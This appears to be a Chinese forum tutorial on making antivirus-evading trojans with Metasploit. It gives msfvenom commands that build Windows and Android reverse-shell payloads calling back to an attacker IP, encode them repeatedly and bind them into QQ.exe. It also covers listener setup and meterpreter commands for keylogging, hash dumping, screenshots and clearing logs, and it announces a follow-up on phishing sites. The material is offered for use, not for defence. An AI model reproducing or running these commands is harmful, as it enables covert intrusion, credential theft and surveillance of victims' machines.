制作exe免杀木马
1.什么是免杀?
免杀技术全称为反杀毒技术 Anti-Virus
简称“免杀”,它指的是一种能使病毒木马免于被杀毒软件查杀的技术。由于免杀技术的涉猎面非常广,其中包含反汇编、逆向工程、系统漏洞等技术,内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。
2.MSF编码
在 Meatsploit 框架下免杀的方式之一就是使用MSF编码器。其功能是对攻击载荷文件进行重新的排列编码,改变可执行文件中的代码形状,避免被杀软认出。MSF 编码器可以将原可执行程序重新编码,生成一个新的二进制文件,这个文件运行以后,MSF 编码器会将原始程序解码到内存中并执行。
言归正传,示例如下
1. 查看编码格式
在Kali终端输入 “msfvenom -l encoders” 列出所有可用编码格式。需要注意的是并不是所有的编码方式都适用于Windows系统,建议使用 “x86/shikata_ga_nai” 格式
2 制作免杀木马
(注:由于裸奔木马容易被杀毒软件查杀,因此需要将木马捆绑到一个正常的软件上,这里使用notepad为例)
裸奔木马:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.171.137 LPORT=5555 -f exe > /root/龙.exe
免杀木马: (注:捆绑一个可执行程序)
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.171.137 LPORT=4444 -e x86/shikata_ga_nai -x QQ.exe -i 12 -f exe -o /root/龙1.0.exe ================================================================================================================
-x 指定木马捆绑在哪个可执行程序模版上 (注:部分参数的含义)
-e 指定编码方式对攻击载荷进行重新编码
-i 指定对目标进行编码的次数,多次编码理论上来讲有助于免杀
-f 指定MSF编码器输出的程序的格式
-o 指定处理完毕后的文件输出路径
=========================================================================================
生成exe木马文件:
测试木马的防杀:
3.运行msf监听模块
(直接发代码)
1. msfconsole
2. use multi/handler4 set payload windows/shell_reverse_tcp
3。 set LHOST (输入攻击者IP) 4. set LPORT 5555 5. exploit
4.运行木马程序
1 meterpreter下的命令: 2 getwd 当前目录 3 dir 查看所有文件 4 cat c:\123.txt 查看文件123.txt内容(数据是字符串传递,所以加一个转义字符\) 5 search -f cmd.exe (搜索名为cmd.exe文件所在目录) 6 upload /root/桌面/backldoor.exe(要上传的文件) -> c:\(上传到的目录) 上传文件 7 download c:\123txt /root 下载文件 8 clearev 清除日志 9 getuid 当前用户 10 ps 查看所用进程 11 kill 杀死某个进程 12 sysinfo 系统信息 13 键盘记录 14 keyscan_start 开始键盘记录 15 keyscan_dump 查看结果 16 keyscan_stop 17 屏幕截图 18 screenshot 29 屏幕监控 20 run vnc 21 获取密文密码 22 hashdump 23 shell 24 获取shell,进入cmd
1.MSF制作安卓木马
裸奔木马:
msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.105.184 LPORT=5555 R > /root/apk.apk
(注:原理与上同样)
如有其解不了的疑问,私聊解答回复
感谢大家提出的意见以及提议!
预计下一贴利用社会工程制作钓鱼网站
已经失效了哎,我编码999次还是被查出来了